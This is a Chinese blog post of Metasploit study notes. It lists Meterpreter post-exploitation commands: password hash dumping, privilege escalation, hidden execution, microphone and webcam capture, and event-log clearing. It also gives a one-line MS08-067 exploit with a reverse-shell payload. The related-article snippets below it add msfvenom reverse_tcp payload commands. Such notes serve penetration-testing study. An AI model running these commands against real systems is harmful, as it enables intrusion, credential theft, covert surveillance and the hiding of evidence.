msf学习笔记(3)

最新推荐文章于 2024-03-07 11:00:00 发布
最新推荐文章于 2024-03-07 11:00:00 发布
阅读量357 收藏 3
点赞数
分类专栏: MSF学习笔记 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianyazm/article/details/78432419
版权

meterpreter

高级、动态、可扩展的Payload

基础命令

help
background
cd
dir /   ls
cat
mkdir
rmdir
mv
rm 
edit    #编辑目标文件
lpwd    #显示本地目录
lcd     #进入本地目录
download    #下载到lpwd目录
upload  #上传
execute -f cmd.exe -i -H #执行程序

进阶命令

run     #调用大量模块进行控制(前台)
bgrun   #调用大量模块进行控制(后台)
download    #下载到lpwd目录
upload  #上传
execute -f cmd.exe -i -H #执行程序,-f指定文件,-i交互,-H隐藏
geiuid  #查看账号
getsystem   #强制获取system权限
getprive    #查看权限
getproxy    #获取代理信息
getpid  #查看自身进程pid
migrate #迁移进程
hashdump    #获取hashdump
sysinfo #获取系统信息
ps  #获取进程信息
kill    #kil进程
show_mount  #查看分区信息
reboot  #重启
shutdown    #关机
shell   #获取操作系统shell
search -f   #搜索文件
arp #查看arp信息
netstat #查看网络连接情况
ipconfig    \   ifconfig    #查看IP地址
route   #路由表
idletime    #目标操作系统空闲时间
resource    #调用资源文件
record_mic  #mic录音
webcam_list #列出摄像头
webcam_snap -i 1 -v false   #每隔1秒拍照
load python #扩展python
clearev #清除日志!!!重要

msfcli

2015年6月已经取消

msfconsole -x

示例

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34;exploit"
tianyazm
关注
专栏目录
MSF学习笔记(11)
Shadow 爬爬记
02-12 936
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1336
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
msf使用
赵花花08042的博客
05-25 1129
msf 云服务器输入msfconsole,进入msf search 查找需要模块 use 该模块 show options查看需要配置内容 命令行输入 connect www.baidu.com 80 连接百度的80端口 back退出,返回400 应该表示是通的 jobs 显示和管理作业 kill 进程 loadpath 加载模块的路径 load 加载插件 route 查看会话路由信息 系统漏洞利用过程 ~ ms08067 10. 天镜,nessuss,极光扫描器进行漏扫 11. 根据漏扫结果,去
Msf命令详解
weixin_53747497的博客
04-10 2101
portfwd - 将本地端口转发到远程服务 例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口。search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 show_mount - 列出所有装载点/逻辑驱动器。
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
weixin_51803729的博客
02-12 5276
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
MSF复现MS17-010漏洞(永恒之蓝)
weixin_51151498的博客
02-07 595
ms17-010
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1927
【Metasploit】MSF常用命令
MSF学习笔记(10)
Shadow 爬爬记
12-11 699
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf学习笔记(4)
Shadow 爬爬记
11-03 1100
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
msf学习笔记(5)
Shadow 爬爬记
11-03 441
MSF弱点扫描vnc密码破解use auxiliary/scanner/vnc/vnc_loginvnc无密码访问use auxiliary/scanner/vnc/vnc_none_authRDP远程桌面漏洞use auxiliary/scanner/rdp/ms12_020_check设备后门use auxiliary/scanner/ssh/juniper_backdoor use auxil
msf命令
qq_52469895的博客
05-19 2236
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 2011
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
内网渗透 Metasploit(MSF)基础使用
最新发布
m0_59598029的博客
03-07 1093
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
MSF使用详解
m0_52051132的博客
10-19 8090
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Metasploit 整理笔记
热门推荐
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
kali linux外网渗透指定ip,kali Linux局域网渗透之win10
weixin_39796152的博客
05-04 4298
kali机:192.168.198.134win10:192.168.198.1我们先来查看下自己的IP地址watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)2020-1-1...
Metasploit Framework(msf)攻击框架使用笔记
weixin_51339377的博客
03-17 2458
Ubuntu快速安装msf的命令: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall msf更新命令 sudo msfupda
msf后渗透
舞动的獾
07-19 3674
主要内容 首先构造一个payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 已经找到一台机器执行了我的payload 进一步获取更高的权限。 获取system权限 load priv getsystems 执行出现超时 先返回msf,保留session
metasploit(MSF)终端命令大全
weixin_33863087的博客
09-28 78
show exploits 列出metasploit框架中的所有******模块。 show payloads 列出metasploit框架中的所有***载荷。 show auxiliary 列出metasploit框架中的所有辅助***载荷。 search name 查找metasploit框架中所有的******和其他模块。 info 展示出制定***...
msf 渗透工具学习材料
08-20
3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值